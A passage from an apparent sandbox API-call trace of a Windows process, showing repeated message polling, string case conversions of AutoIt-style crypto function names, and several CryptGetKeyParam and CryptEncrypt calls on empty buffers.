lpMsg=0x61ee24) returned 0 [0077.370] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.370] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.370] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.370] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.370] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.370] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.370] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0077.370] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.370] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.370] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0077.370] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0077.370] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.370] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0077.370] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0077.370] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.371] PeekMessageW (in: lpMsg=0x61dd8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61dd8c) returned 0 [0077.371] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.371] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb648, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb648*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.371] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0077.371] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0077.371] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.371] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.371] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.371] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.371] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.371] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.371] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.371] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.371] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.371] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0077.371] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.371] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.380] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.380] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0077.380] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0077.380] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.380] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.381] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.381] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.381] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.381] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.381] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0077.381] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.381] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.381] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.381] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.381] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.381] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.381] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.381] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.381] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.381] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.381] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0077.381] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.382] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb578*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb578*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.382] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.382] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.382] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.382] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.382] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.382] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.382] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.382] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.382] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.382] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0077.382] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0077.382] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.382] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.382] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0077.382] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.382] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.382] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.383] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.383] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.383] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.383] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.383] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.383] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.383] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.383] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.383] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.383] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0077.383] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.383] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.383] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0077.383] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0077.383] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.383] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0077.383] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0077.383] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.383] PeekMessageW (in: lpMsg=0x61dd8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61dd8c) returned 0 [0077.383] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.383] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb3b8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb3b8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.384] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0077.384] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0077.384] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.384] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.384] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.384] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.384] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.384] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.384] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.384] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.384] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.384] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0077.384] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.384] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.384] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.384] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0077.384] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0077.384] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.385] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.385] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.385] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.385] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.385] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.385] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0077.385] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.385] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.385] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.385] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.385] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.385] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.385] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.385] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.385] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.385] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.385] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0077.385] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.385] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb438*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb438*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.385] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.385] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.385] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.385] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.385] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.386] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.386] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.386] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.386] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.386] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0077.386] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0077.386] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0077.386] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.386] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0077.386] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0077.386] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.386] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.393] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.393] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb538, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb538*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.393] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.393] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.393] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.393] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.393] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.393] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.393] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.393] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.393] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.393] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb4b8*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: 